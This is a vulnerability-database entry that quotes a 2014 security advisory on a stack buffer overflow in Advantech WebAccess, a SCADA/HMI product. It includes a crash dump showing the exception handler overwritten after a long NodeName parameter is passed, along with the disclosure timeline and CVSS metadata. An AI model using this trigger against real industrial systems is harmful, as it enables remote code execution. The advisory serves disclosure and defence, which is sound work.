Below is shown the result of opening a malicious html file with a long NodeName parameter, an attacker can overflow the stack buffer mentioned above and overwrite the SEH (Structured Exception Handler), enabling arbitrary code execution on the machine.
/-----
EAX 03A39942 ASCII "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB..." ECX 0162B720 EDX 01630000 xpsp2res.01630000 EBX 0162B720 ESP 0162B454 EBP 0162B460 ESI 0162B4D8 EDI 03A31E98 EIP 064EA6D4 webvact.064EA6D4
-----/
/-----
SEH chain of thread 000016CC Address SE handler 0162DB40 42424242
-----/
-
Report Timeline . 2014-05-06: Core Security notifies Advantech of the vulnerability. Publication date is set for May 26th, 2014. 2014-05-09: CORE asks for a reply. 2014-05-26: First release date missed. 2014-05-26: Core Security notifies that the issues were reported 2 weeks ago and there was no reply since May 6th, 2014. 2014-05-29: Core Security contacts the ICS-CERT for assistance in order to coordinate the disclosure of the advisory. 2014-05-29: ICS-CERT acknowledges Core Security e-mail, and asks for a technical description of the vulnerability. 2014-05-29: Core Security sends technical details to the ICS-CERT. 2014-06-05: ICS-CERT team notifies that they have contacted the vendor and that they will notify us once the vendor has validated the vulnerabilities. 2014-06-18: ICS-CERT team notifies that the vendor is working in a new release, expected to be released in September, and ask if Core Security is interested in validating Advantech's vulnerability fix in their beta version. 2014-06-18: Core Security accepts the testing of the vendor beta version, but shares their concerns about waiting several months for fixes that are related to vulnerabilities already public. 2014-06-18: ICS-CERT notifies that they will let us know when they plan to make the beta version available for testing. 2014-07-03: ICS-CERT team notifies that the vendor is working to provide a download link for the beta version. 2014-07-08: ICS-CERT team sends download link provided by the vendor. 2014-07-10: Core Security confirms to ICS-CERT that the new version it's still vulnerable, and comments that after some analysis the vulnerable function doesn't has changes. 2014-07-10: ICS-CERT notifies that they will let the vendor know that that the vulnerabilities still exist. And asks to setup a teleconference between Core Security, the CERT and the vendor. 2014-07-10: Core Security notifies the ICS-CERT that all interactions are made via email only. 2014-07-10: ICS-CERT notifies they provided the information to the vendor. 2014-07-21: Core Security notifies the ICS-CERT that Tipping Point Zero Day Initiative has released several advisories[2] affecting the vendor including some that appears to be related to the one we are coordinating. 2014-07-21: ICS-CERT notifies that some of those advisories where in coordination with them, and that after a review of the link shared by Core Security are related to ICSA-14-198-02 and don't appear to be related to the reported vulnerability. 2014-07-21: Core Security notifies that ZDI-14-243 and ZDI-14-244 appears to be directly related. 2014-07-21: ICS-CERT is trying to contact Advantech to get a status update and their current plan for vulnerability remediation. 2014-08-07: ICS-CERT notifies that they contacted the vendor and they are waiting for an status update. 2014-08-21: Core Security contacts ICS-CERT since no reply was received in the past two weeks. 2014-08-21: ICS-CERT notifies that vendor representative stated that they are currently training a new product manager and they have not yet responded to the vulnerabilities we are discussing. 2014-08-28: Core Security notifies the ICS-CERT that the advisory publication is going to be scheduled for Monday 1st of September. 2014-08-28: ICS-CERT acknowledges Core Security e-mail. 2014-08-28: Core Security re-schedules the advisory publication for Sep 2nd, 2014. 2014-09-02: Core Security found out that the vendor released a silent fix on 30th of July. 2014-09-02: Core Security releases the advisory CORE-2014-0005 tagged as user-release.
-
References
[1] http://webaccess.advantech.com/. [2] http://www.zerodayinitiative.com/advisories/published/. [3] http://support.microsoft.com/kb/2458544. [4] https://github.com/CoreSecurity/sentinel.
-
About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
-
About Core Security Technologies
Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.
-
Disclaimer
The contents of this advisory are copyright (c) 2014 Core Security and (c) 2014 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
-
PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201409-0441", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 3.0, "vendor": "advantech", "version": "7.2" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "advantech webaccess", "version": "7.2" } ], "sources": [ { "db": "IVD", "id": "d2831bd2-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-05423" }, { "db": "JVNDB", "id": "JVNDB-2014-004353" }, { "db": "CNNVD", "id": "CNNVD-201409-734" }, { "db": "NVD", "id": "CVE-2014-0987" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-004353" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Ricardo Narvaja", "sources": [ { "db": "BID", "id": "69532" } ], "trust": 0.3 }, "cve": "CVE-2014-0987", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "CVE-2014-0987", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.9, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2014-05423", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "d2831bd2-2351-11e6-abef-000c29c66e3d", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "VHN-68480", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2014-0987", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2014-0987", "trust": 0.8, "value": "Medium" }, { "author": "CNVD", "id": "CNVD-2014-05423", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201409-734", "trust": 0.6, "value": "MEDIUM" }, { "author": "IVD", "id": "d2831bd2-2351-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-68480", "trust": 0.1, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2014-0987", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "d2831bd2-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-05423" }, { "db": "VULHUB", "id": "VHN-68480" }, { "db": "VULMON", "id": "CVE-2014-0987" }, { "db": "JVNDB", "id": "JVNDB-2014-004353" }, { "db": "CNNVD", "id": "CNNVD-201409-734" }, { "db": "NVD", "id": "CVE-2014-0987" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Stack-based buffer overflow in Advantech WebAccess (formerly BroadWin WebAccess) 7.2 allows remote attackers to execute arbitrary code via the NodeName2 parameter. Advantech WebAccess is an IE-based HMI/SCADA monitoring software featuring all engineering projects, database setup, drawing and software management using standard browsers over the internet or intranet. A buffer overflow vulnerability exists in Advantech WebAccess. An attacker exploits a vulnerability to execute arbitrary code in the context of an affected application or to crash the entire application. Advantech WebAccess is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. Failed exploit attempts will likely cause a denial-of-service condition. \nAdvantech WebAccess 7.2 is vulnerable; other versions may also be affected. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nAdvantech WebAccess Vulnerabilities\n\n\n1. *Advisory Information*\n\n Title: Advantech WebAccess Vulnerabilities\n Advisory ID: CORE-2014-0005\n Advisory URL:\nhttp://www.coresecurity.com/advisories/advantech-webaccess-vulnerabilities\n Date published: 2014-09-02\n Date of last update: 2014-09-01\n Vendors contacted: Advantech\n Release mode: User release\n\n\n2. *Vulnerability Description*\n\n Advantech WebAccess [1] is a browser-based\n software package for human-machine interfaces HMI, and supervisory\n control and data acquisition SCADA. \n\n\n4. WebAccess 7.2\n . \n\n\n5. *Non-vulnerable packages*\n\n . AdvantechWebAccessUSANode_20140730_3.4.3\n\n\n6. *Vendor Information, Solutions and Workarounds*\n\n Advantech has addressed the vulnerability in WebAccess by issuing an\nupdate located at\n http://webaccess.advantech.com/downloads_software.php\n\n Given that this is a client-side vulnerability, affected users\nshould avoid\n opening untrusted \u0027.html\u0027 files. \n Core Security also recommends those affected use third party\nsoftware such as\n Sentinel [4] or EMET [3]\n that could help to prevent the exploitation of affected systems to\nsome extent. \n\n\n7. *Credits*\n\n This vulnerability was discovered and researched by Ricardo Narvaja\nfrom\n Core Security Exploit Writers Team. \n \n Core Security Advisories Team would also like to thank ICS-CERT\nCoordination Center\n for their assistance during the vulnerability reporting process. \n \n\n8. \n\n Below is shown the result of opening a malicious html file with a long\n NodeName parameter, an attacker can overflow the stack buffer mentioned\n above and overwrite the SEH (Structured Exception Handler), enabling\n arbitrary code execution on the machine. \n\n/-----\n \nEAX 03A39942 ASCII \"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB...\"\nECX 0162B720\nEDX 01630000 xpsp2res.01630000\nEBX 0162B720\nESP 0162B454\nEBP 0162B460\nESI 0162B4D8\nEDI 03A31E98\nEIP 064EA6D4 webvact.064EA6D4\n\n-----/\n\n\n/-----\n \nSEH chain of thread 000016CC\nAddress SE handler\n0162DB40 42424242\n\n-----/\n\n\n9. *Report Timeline*\n . 2014-05-06: Core Security notifies Advantech of the vulnerability. \nPublication date is set for May 26th, 2014. 2014-05-09: CORE asks for a reply. 2014-05-26: First release date missed. 2014-05-26: Core Security notifies that the issues were reported 2\nweeks ago and there was no reply since May 6th, 2014. 2014-05-29: Core Security contacts the ICS-CERT for assistance in\norder to coordinate the disclosure of the advisory. 2014-05-29: ICS-CERT acknowledges Core Security e-mail, and asks\nfor a technical description of the vulnerability. 2014-05-29: Core Security sends technical details to the ICS-CERT. 2014-06-05: ICS-CERT team notifies that they have contacted the\nvendor and that they will notify us once the vendor has validated the\nvulnerabilities. 2014-06-18: ICS-CERT team notifies that the vendor is working in a\nnew release, expected to be released in September, and ask if Core\nSecurity is interested in validating Advantech\u0027s vulnerability fix in\ntheir beta version. 2014-06-18: Core Security accepts the testing of the vendor beta\nversion, but shares their concerns about waiting several months for\nfixes that are related to vulnerabilities already public. 2014-06-18: ICS-CERT notifies that they will let us know when they\nplan to make the beta version available for testing. 2014-07-03: ICS-CERT team notifies that the vendor is working to\nprovide a download link for the beta version. 2014-07-08: ICS-CERT team sends download link provided by the vendor. 2014-07-10: Core Security confirms to ICS-CERT that the new\nversion it\u0027s still vulnerable, and comments that after some analysis the\nvulnerable function doesn\u0027t has changes. 2014-07-10: ICS-CERT notifies that they will let the vendor know\nthat that the vulnerabilities still exist. And asks to setup a\nteleconference between Core Security, the CERT and the vendor. 2014-07-10: Core Security notifies the ICS-CERT that all\ninteractions are made via email only. 2014-07-10: ICS-CERT notifies they provided the information to the\nvendor. 2014-07-21: Core Security notifies the ICS-CERT that Tipping Point\nZero Day Initiative has released several advisories[2] affecting the\nvendor including some that appears to be related to the one we are\ncoordinating. 2014-07-21: ICS-CERT notifies that some of those advisories where\nin coordination with them, and that after a review of the link shared by\nCore Security are related to ICSA-14-198-02 and don\u0027t appear to be\nrelated to the reported vulnerability. 2014-07-21: Core Security notifies that ZDI-14-243 and ZDI-14-244\nappears to be directly related. 2014-07-21: ICS-CERT is trying to contact Advantech to get a\nstatus update and their current plan for vulnerability remediation. 2014-08-07: ICS-CERT notifies that they contacted the vendor and\nthey are waiting for an status update. 2014-08-21: Core Security contacts ICS-CERT since no reply was\nreceived in the past two weeks. 2014-08-21: ICS-CERT notifies that vendor representative stated\nthat they are currently training a new product manager and they have not\nyet responded to the vulnerabilities we are discussing. 2014-08-28: Core Security notifies the ICS-CERT that the advisory\npublication is going to be scheduled for Monday 1st of September. 2014-08-28: ICS-CERT acknowledges Core Security e-mail. 2014-08-28: Core Security re-schedules the advisory publication\nfor Sep 2nd, 2014. 2014-09-02: Core Security found out that the vendor released a\nsilent fix on 30th of July. 2014-09-02: Core Security releases the advisory CORE-2014-0005\ntagged as user-release. \n\n\n10. *References*\n\n [1] http://webaccess.advantech.com/. \n [2] http://www.zerodayinitiative.com/advisories/published/. \n [3] http://support.microsoft.com/kb/2458544. \n [4] https://github.com/CoreSecurity/sentinel. \n\n\n11. *About CoreLabs*\n\n CoreLabs, the research center of Core Security, is charged with\nanticipating\n the future needs and requirements for information security\ntechnologies. \n We conduct our research in several important areas of computer security\n including system vulnerabilities, cyber attack planning and simulation,\n source code auditing, and cryptography. Our results include problem\n formalization, identification of vulnerabilities, novel solutions and\n prototypes for new technologies. CoreLabs regularly publishes security\n advisories, technical papers, project information and shared software\n tools for public use at:\n http://corelabs.coresecurity.com. \n\n\n12. *About Core Security Technologies*\n\n Core Security Technologies enables organizations to get ahead of threats\n with security test and measurement solutions that continuously identify\n and demonstrate real-world exposures to their most critical assets. Our\n customers can gain real visibility into their security standing, real\n validation of their security controls, and real metrics to more\n effectively secure their organizations. \n\n Core Security\u0027s software solutions build on over a decade of trusted\n research and leading-edge threat expertise from the company\u0027s Security\n Consulting Services, CoreLabs and Engineering groups. Core Security\n Technologies can be reached at +1 (617) 399-6980 or on the Web at:\n http://www.coresecurity.com. \n\n\n13. *Disclaimer*\n\n The contents of this advisory are copyright\n (c) 2014 Core Security and (c) 2014 CoreLabs,\n and are licensed under a Creative Commons\n Attribution Non-Commercial Share-Alike 3.0 (United States) License:\n http://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n\n14. *PGP/GPG Keys*\n\n This advisory has been signed with the GPG key of Core Security\nadvisories\n team, which is available for download at\n \nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc", "sources": [ { "db": "NVD", "id": "CVE-2014-0987" }, { "db": "JVNDB", "id": "JVNDB-2014-004353" }, { "db": "CNVD", "id": "CNVD-2014-05423" }, { "db": "BID", "id": "69532" }, { "db": "IVD", "id": "d2831bd2-2351-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-68480" }, { "db": "VULMON", "id": "CVE-2014-0987" }, { "db": "PACKETSTORM", "id": "128120" } ], "trust": 2.88 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2014-0987", "trust": 3.8 }, { "db": "ICS CERT", "id": "ICSA-14-261-01", "trust": 3.2 }, { "db": "BID", "id": "69532", "trust": 2.1 }, { "db": "CNNVD", "id": "CNNVD-201409-734", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2014-05423", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2014-004353", "trust": 0.8 }, { "db": "CXSECURITY", "id": "WLB-2014090006", "trust": 0.6 }, { "db": "IVD", "id": "D2831BD2-2351-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-68480", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2014-0987", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128120", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "d2831bd2-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-05423" }, { "db": "VULHUB", "id": "VHN-68480" }, { "db": "VULMON", "id": "CVE-2014-0987" }, { "db": "BID", "id": "69532" }, { "db": "JVNDB", "id": "JVNDB-2014-004353" }, { "db": "PACKETSTORM", "id": "128120" }, { "db": "CNNVD", "id": "CNNVD-201409-734" }, { "db": "NVD", "id": "CVE-2014-0987" } ] }, "id": "VAR-201409-0441", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "d2831bd2-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-05423" }, { "db": "VULHUB", "id": "VHN-68480" } ], "trust": 1.33470696 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "d2831bd2-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-05423" } ] }, "last_update_date": "2024-11-23T22:38:56.255000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.co.jp/products/GF-1M94V/Advantech-WebAccess/mod_B975C492-56B3-4EBA-8BBB-5B6D3483EE9D.aspx" }, { "title": "Patch for Advantech WebAccess Buffer Overflow Vulnerability (CNVD-2014-05423)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/53293" }, { "title": "AdvantechWebAccessUSANode_20140730_3.4.3", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=51645" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2014-05423" }, { "db": "JVNDB", "id": "JVNDB-2014-004353" }, { "db": "CNNVD", "id": "CNNVD-201409-734" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-119", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-68480" }, { "db": "JVNDB", "id": "JVNDB-2014-004353" }, { "db": "NVD", "id": "CVE-2014-0987" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.3, "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-261-01" }, { "trust": 1.2, "url": "http://www.securityfocus.com/bid/69532" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0987" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-0987" }, { "trust": 0.6, "url": "http://cxsecurity.com/issue/wlb-2014090006" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/119.html" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=35592" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0987" }, { "trust": 0.1, "url": "http://corelabs.coresecurity.com/" }, { "trust": 0.1, "url": "http://webaccess.advantech.com/." }, { "trust": 0.1, "url": "http://www.coresecurity.com." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0988" }, { "trust": 0.1, "url": "http://www.zerodayinitiative.com/advisories/published/." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0992" }, { "trust": 0.1, "url": "http://www.coresecurity.com/advisories/advantech-webaccess-vulnerabilities" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0989" }, { "trust": 0.1, "url": "https://github.com/coresecurity/sentinel." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0991" }, { "trust": 0.1, "url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0990" }, { "trust": 0.1, "url": "http://corelabs.coresecurity.com." }, { "trust": 0.1, "url": "http://webaccess.advantech.com/downloads_software.php" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0986" }, { "trust": 0.1, "url": "http://support.microsoft.com/kb/2458544." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0985" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2014-05423" }, { "db": "VULHUB", "id": "VHN-68480" }, { "db": "VULMON", "id": "CVE-2014-0987" }, { "db": "JVNDB", "id": "JVNDB-2014-004353" }, { "db": "PACKETSTORM", "id": "128120" }, { "db": "CNNVD", "id": "CNNVD-201409-734" }, { "db": "NVD", "id": "CVE-2014-0987" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "d2831bd2-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-05423" }, { "db": "VULHUB", "id": "VHN-68480" }, { "db": "VULMON", "id": "CVE-2014-0987" }, { "db": "BID", "id": "69532" }, { "db": "JVNDB", "id": "JVNDB-2014-004353" }, { "db": "PACKETSTORM", "id": "128120" }, { "db": "CNNVD", "id": "CNNVD-201409-734" }, { "db": "NVD", "id": "CVE-2014-0987" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-09-05T00:00:00", "db": "IVD", "id": "d2831bd2-2351-11e6-abef-000c29c66e3d" }, { "date": "2014-09-05T00:00:00", "db": "CNVD", "id": "CNVD-2014-05423" }, { "date": "2014-09-20T00:00:00", "db": "VULHUB", "id": "VHN-68480" }, { "date": "2014-09-20T00:00:00", "db": "VULMON", "id": "CVE-2014-0987" }, { "date": "2014-09-02T00:00:00", "db": "BID", "id": "69532" }, { "date": "2014-09-24T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-004353" }, { "date": "2014-09-02T22:28:11", "db": "PACKETSTORM", "id": "128120" }, { "date": "2014-09-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201409-734" }, { "date": "2014-09-20T10:55:04.027000", "db": "NVD", "id": "CVE-2014-0987" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-12-29T00:00:00", "db": "CNVD", "id": "CNVD-2014-05423" }, { "date": "2015-08-05T00:00:00", "db": "VULHUB", "id": "VHN-68480" }, { "date": "2015-08-05T00:00:00", "db": "VULMON", "id": "CVE-2014-0987" }, { "date": "2014-09-22T18:05:00", "db": "BID", "id": "69532" }, { "date": "2014-09-24T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-004353" }, { "date": "2014-09-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201409-734" }, { "date": "2024-11-21T02:03:10.017000", "db": "NVD", "id": "CVE-2014-0987" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201409-734" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess Vulnerable to stack-based buffer overflow", "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-004353" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Buffer overflow", "sources": [ { "db": "IVD", "id": "d2831bd2-2351-11e6-abef-000c29c66e3d" }, { "db": "CNNVD", "id": "CNNVD-201409-734" } ], "trust": 0.8 } }
var-201708-1724
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within RtspVapgDecoderNew2.dll. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.
